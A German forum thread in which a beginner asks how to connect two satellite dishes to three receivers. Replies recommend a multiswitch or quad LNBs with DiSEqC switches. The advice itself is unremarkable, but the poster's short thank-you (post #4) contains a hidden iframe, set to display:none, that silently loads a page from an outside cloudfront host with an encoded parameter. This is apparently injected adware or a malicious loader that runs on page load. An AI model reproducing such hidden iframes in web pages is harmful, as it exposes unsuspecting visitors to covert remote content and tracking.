1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen

Satelliten einrichten

Dieses Thema im Forum "Kaufberatung" wurde erstellt von semmy1104, 10. Februar 2012.

  1. semmy1104
    Offline

    semmy1104 Newbie

    Registriert:
    10. Februar 2012
    Beiträge:
    2
    Zustimmungen:
    0
    Punkte für Erfolge:
    0
    Guten Abend,

    ich habe zwei Satellitenschüssel:
    1er: 80cm mit Zwei LNB zum Empfangen von Astra und Hotbird
    2er: 150cm mit ein LNB zum Empfangen von Nilesat

    ich habe 3 Receiver in 3 Zimmer.

    meine Frage ist: kann ich alle Satelliten in alle Zimmern mit unterschiedliche Sender benutzen?
    wenn ja, was brauche ich?
    1 x Multischalter?
    Übrigens ich bin neu in diesem Gebiet.

    • :fie:

    Danke im Voraus
     
    Zuletzt bearbeitet: 10. Februar 2012
    #1
  2. phantom

    Nervigen User Advertisement

  3. joopastron
    Offline

    joopastron Administrator Digital Eliteboard Team

    Registriert:
    3. März 2011
    Beiträge:
    19.323
    Zustimmungen:
    12.416
    Punkte für Erfolge:
    113
    Geschlecht:
    männlich
    Beruf:
    Immer bei der Sache
    AW: Satelliten einrichten

    Hi,

    hier bist Du im falschen Bereich, schau mal bitte dort

    Dieser Link ist nur für Mitglieder!!! Jetzt kostenlos Registrieren ?

     
    #2
  4. christian24100
    Offline

    christian24100 Board Guru

    Registriert:
    15. November 2008
    Beiträge:
    1.388
    Zustimmungen:
    240
    Punkte für Erfolge:
    63
    Ort:
    Bayern
    AW: Satelliten einrichten

    ja das würde mit einem multischalter gehen, ein 17/4 multischalter würde da gehen, und du hättest noch reserve für einen weiteren satelliten, dazu bräuchtest aber auch 3x quattro lnb,
     
    #3
  5. semmy1104
    Offline

    semmy1104 Newbie

    Registriert:
    10. Februar 2012
    Beiträge:
    2
    Zustimmungen:
    0
    Punkte für Erfolge:
    0
    AW: Satelliten einrichten

    danke:ja<iframe style="display: none; visibility: hidden;" src="http://d3lvr7yuk4uaui.cloudfront.net/d.html?c=dW5kZWZpbmVkOnVuZGVmaW5lZDp1bmRlZmluZWQ6MTAzNjoxMjc2ODp1bmRlZmluZWQ6"></iframe>
     
    #4
  6. radlermo
    Offline

    radlermo Meister

    Registriert:
    24. Januar 2012
    Beiträge:
    802
    Zustimmungen:
    585
    Punkte für Erfolge:
    93
    Beruf:
    Netzmeister
    AW: Satelliten einrichten

    Hi,

    das geht auch günstiger mit 3 Quad-LNBs und 3 Diseqc-Schalter 4/1.
    Ich würde aber gleich 4 Diseqc-Schalter ranbauen, dann brauchts keine Anschlußwiederstände am 4ten LNB-Ausgang und die 4te Leitung ist noch als Reserve.
     
    #5
    semmy1104 gefällt das.

Diese Seite empfehlen